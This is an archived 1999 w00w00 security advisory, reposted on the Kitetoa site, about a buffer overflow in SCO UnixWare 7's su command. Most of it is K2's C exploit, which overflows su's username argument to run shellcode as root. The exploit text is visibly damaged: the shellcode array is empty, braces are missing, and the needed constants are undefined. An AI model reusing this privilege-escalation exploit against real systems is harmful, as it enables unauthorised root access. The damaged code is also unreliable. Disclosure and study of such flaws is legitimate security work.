[Kitetoa, les pizzaïolos du Ouèb

w00giving 99 -6-

Sommaire de ce dossier
Ze advisories
Ze linkz
w00w00 Security Development (WSD)

Sorry, we've been really tied up these past 2-3 weeks and have been unable
to write up the advisories.  We'll send three SCO advisories tonight to
make up for it.  We should have some interesting ones within the next two
weeks (it's really hard to find the time to write up the exploits and

You'll noticed we jumped from #3 to #5.  w00giving advisory #4 has been
available on http://www.w00w00.org/advisories.html for 2-3 weeks, but
it wasn't posted to this list.  w00w00.org has had hits from 55 different
countries as of yesterday.

If you are going to send out advisories, please cc them to
news@technotronic.com, also.  You can subscribe to it by sending
"subscribe news" to majordomo@technotronic.com.   Technotronic is a good
site and beginning now, you will always see our advisories/articles/code
posted on there first (order of release: w00w00.org,
news@technotronic.com, news groups, bugtraq).

Discovered by: K2 (ktwo@ktwo.ca)

The su command on SCO's UnixWare 7 has improper bounds checking on the
username passed (via argv[1]), which can cause a buffer overflow when
a lengthy username is passed.

Exploit (by K2):

// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =

const char x86_nop=0x90;
long nop,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[])
    register int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);
        nop = NOPDEF;
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("offset = [0x%x]\n",esp+offset);
    execl("/usr/bin/su", "su", buffer, NULL);

    printf("exec failed!\n");
    return 0;


SCO is in the process of fixing a list of vulnerabilities we sent a few
weeks ago.



Liens de navigation

Naviguer, lire....

Page d'accueil


Le Sommaire



Le Forum

Nous écrire

Les mailing-lists

Les stats du serveur

Qui sommes-nous?

Les rubriques!

Les livres publiés par Kitetoa

Les interviews


Fonds d'écran et autres trucs

Les rubriques!




la malle de Kitetoa
(vieilleries du site)

Les dossiers

Le monde fou des Admins

Tati versus Kitetoa

Tegam versus Guillermito

Malade mental...

Qui est Jean-Paul Ney,
condamné pour
menaces de mort
réitérées contre Kitetoa?

Le texte de la condamnation
de Jean-Paul Ney
(résumé html)
(complet pdf)

Malade mental, bis repetita

Jean-Paul Ney condamné
pour diffamation
à l'encontre du webmaster
de Kitetoa.com

Condamnation de Jean-Paul Ney
pour diffamation (pdf)

D'autres choses...



L'association Kite-Aide


sur le site

et sur le Net...

Jean-Paul Ney

Jean-Paul Ney